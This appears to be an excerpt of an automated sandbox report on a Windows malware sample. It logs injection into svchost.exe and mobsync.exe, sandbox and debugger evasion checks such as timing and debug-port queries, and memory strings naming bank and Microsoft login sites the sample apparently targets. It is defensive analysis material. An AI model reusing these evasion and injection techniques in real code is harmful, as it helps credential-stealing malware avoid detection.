                Source: tfWjjV1LdT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: tfWjjV1LdT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: tfWjjV1LdT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.2272782502.000000000322B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272687879.000000000322C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272797375.0000000003242000.00000004.00000020.00020000.00000000.sdmp, ldZEVEbpOrO.exe, 00000004.00000002.3896193595.000000000168E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ldZEVEbpOrO.exe, 00000004.00000000.2229278748.000000000090E000.00000002.00000001.01000000.00000005.sdmp, ldZEVEbpOrO.exe, 00000006.00000000.2382349293.000000000090E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: tfWjjV1LdT.exe, 00000000.00000003.2085455684.0000000003590000.00000004.00001000.00020000.00000000.sdmp, tfWjjV1LdT.exe, 00000000.00000003.2085591228.0000000003730000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2212680424.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2307995394.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2307995394.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2210467836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3896686237.0000000004CF0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3896686237.0000000004E8E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2311789214.0000000004B48000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2309031499.000000000499E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: tfWjjV1LdT.exe, 00000000.00000003.2085455684.0000000003590000.00000004.00001000.00020000.00000000.sdmp, tfWjjV1LdT.exe, 00000000.00000003.2085591228.0000000003730000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2212680424.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2307995394.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2307995394.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2210467836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3896686237.0000000004CF0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3896686237.0000000004E8E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2311789214.0000000004B48000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2309031499.000000000499E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.2272782502.000000000322B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272687879.000000000322C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2272797375.0000000003242000.00000004.00000020.00020000.00000000.sdmp, ldZEVEbpOrO.exe, 00000004.00000002.3896193595.000000000168E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: mobsync.exe, 00000005.00000002.3895710577.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3897126671.000000000531C000.00000004.10000000.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2613143278.000000002DC3C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: mobsync.exe, 00000005.00000002.3895710577.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3897126671.000000000531C000.00000004.10000000.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2613143278.000000002DC3C000.00000004.80000000.00040000.00000000.sdmp
                Source: tfWjjV1LdT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: tfWjjV1LdT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: tfWjjV1LdT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: tfWjjV1LdT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: tfWjjV1LdT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_00694B37 LoadLibraryA,GetProcAddress,0_2_00694B37
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_0069C4C6 push A30069BAh; retn 0069h0_2_0069C50D
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006B8945 push ecx; ret 0_2_006B8958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004143C1 push cs; ret 2_2_004143C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403070 push eax; ret 2_2_00403072
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004120AF push ebp; retf 2_2_004120B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418172 push esi; retf 2_2_0041817D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AADE push ebp; iretd 2_2_0040AAE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414344 push cs; ret 2_2_004143C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417C7C push esi; iretd 2_2_00417C7F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413D3D push esp; ret 2_2_00413D3E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040CE68 push ecx; retf 2_2_0040CE6B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380225F pushad ; ret 2_2_038027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038027FA pushad ; ret 2_2_038027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD push ecx; mov dword ptr [esp], ecx2_2_038309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380283D push eax; iretd 2_2_03802858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03801368 push eax; iretd 2_2_03801369
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_006948D7
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_00715376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00715376
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006B3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006B3187
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeAPI/Special instruction interceptor: Address: D53E54
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E rdtsc 2_2_0387096E
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-102296
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeAPI coverage: 4.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\mobsync.exe TID: 7056Thread sleep count: 43 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exe TID: 7056Thread sleep time: -86000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe TID: 1292Thread sleep time: -50000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006F445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_006F445A
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006FC6D1 FindFirstFileW,FindClose,0_2_006FC6D1
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_006FC75C
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006FEF95
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006FF0F2
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006FF3F3
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006F37EF
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006F3B12
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006FBCBC
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006949A0
                Source: 10O4645j.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 10O4645j.5.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 10O4645j.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 10O4645j.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 10O4645j.5.drBinary or memory string: global block list test formVMware20,11696428655
                Source: 10O4645j.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 10O4645j.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 10O4645j.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 10O4645j.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 10O4645j.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 10O4645j.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 10O4645j.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 10O4645j.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 10O4645j.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 10O4645j.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: mobsync.exe, 00000005.00000002.3895710577.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2616087729.000001BAEDBEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: ldZEVEbpOrO.exe, 00000006.00000002.3896485819.0000000000B3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{{
                Source: 10O4645j.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 10O4645j.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 10O4645j.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 10O4645j.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: mobsync.exe, 00000005.00000002.3898701952.000000000813C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ice.comVMware20,11696428655s
                Source: 10O4645j.5.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 10O4645j.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 10O4645j.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 10O4645j.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 10O4645j.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 10O4645j.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: mobsync.exe, 00000005.00000002.3898701952.000000000813C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,116964286557&f
                Source: 10O4645j.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 10O4645j.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 10O4645j.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 10O4645j.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 10O4645j.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 10O4645j.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeAPI call chain: ExitProcess graph end nodegraph_0-101245
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E rdtsc 2_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417543 LdrLoadDll,2_2_00417543
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_00703F09 BlockInput,0_2_00703F09
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_00693B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00693B3A
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_006C5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_006C5A7C
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_00694B37 LoadLibraryA,GetProcAddress,0_2_00694B37
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_00D540C0 mov eax, dword ptr fs:[00000030h]0_2_00D540C0
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_00D54120 mov eax, dword ptr fs:[00000030h]0_2_00D54120
                Source: C:\Users\user\Desktop\tfWjjV1LdT.exeCode function: 0_2_00D52A90 mov eax, dword ptr fs:[00000030h]0_2_00D52A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]2_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]2_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC3CD mov eax, dword ptr fs:[00000030h]2_2_038EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B63C0 mov eax, dword ptr fs:[00000030h]2_2_038B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov ecx, dword ptr fs:[00000030h]2_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]2_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]2_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038663FF mov eax, dword ptr fs:[00000030h]2_2_038663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C310 mov ecx, dword ptr fs:[00000030h]2_2_0382C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850310 mov ecx, dword ptr fs:[00000030h]2_2_03850310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]2_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov ecx, dword ptr fs:[00000030h]2_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]2_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]2_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov ecx, dword ptr fs:[00000030h]2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA352 mov eax, dword ptr fs:[00000030h]2_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D8350 mov ecx, dword ptr fs:[00000030h]2_2_038D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390634F mov eax, dword ptr fs:[00000030h]2_2_0390634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D437C mov eax, dword ptr fs:[00000030h]2_2_038D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]2_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]2_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h]2_2_038402A0
